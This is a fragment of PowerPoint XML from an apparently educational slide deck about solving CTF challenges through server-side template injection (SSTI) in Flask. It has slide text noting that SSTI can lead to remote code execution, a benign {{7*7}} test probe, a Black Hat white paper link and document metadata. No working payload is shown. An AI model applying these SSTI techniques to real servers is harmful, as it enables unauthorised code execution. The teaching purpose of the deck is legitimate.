              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The template injection essentially allows an attacker to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inject syntax into templates which is then executed in the context of the server. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>This can lead to all sorts of fun stuff, like arbitrary RCE. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>White paper from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>Blackhat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>www.blackhat.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="173247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{ACE9ABB1-6D31-BF40-A9CA-B0120355FD51}tf16401369</Template>
  <TotalTime>1384</TotalTime>
  <Words>1434</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>146</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PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Hints, puns and available content is usually always the key solving CTF challenges</vt:lpstr>
      <vt:lpstr>Some challenges that essentially told you which path to take</vt:lpstr>
      <vt:lpstr>Science!</vt:lpstr>
      <vt:lpstr>Before we go a further, a bit of information on Flask</vt:lpstr>
      <vt:lpstr>A bit more on Flask</vt:lpstr>
      <vt:lpstr>Flask…</vt:lpstr>
      <vt:lpstr>{{7*7}} = 49 and of course {{7*’7’}} = 7777777</vt:lpstr>
      <vt:lpstr>How does Template Injection work?</vt:lpstr>
      <vt:lpstr>A quick example - stolen from the internet ;)</vt:lpstr>
      <vt:lpstr>A quick example - stolen from the internet ;)</vt:lpstr>
      <vt:lpstr>A quick example - stolen from the internet ;)</vt:lpstr>
      <vt:lpstr>A quick example - stolen from the internet ;)</vt:lpstr>
      <vt:lpstr>Finding flags</vt:lpstr>
      <vt:lpstr>Finding the flag</vt:lpstr>
      <vt:lpstr>Finding the flag</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Reading about Server-Side Template Injection (SSTI)</vt:lpstr>
      <vt:lpstr>Other CTF tips (mostly for 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Olsen, Alexander</dc:creator>
  <cp:lastModifiedBy>Olsen, Alexander</cp:lastModifiedBy>
  <cp:revision>169</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-03-16T02:02:31Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-03-17T01:08:26Z</dcterms:modified>
</cp:coreProperties>
</file>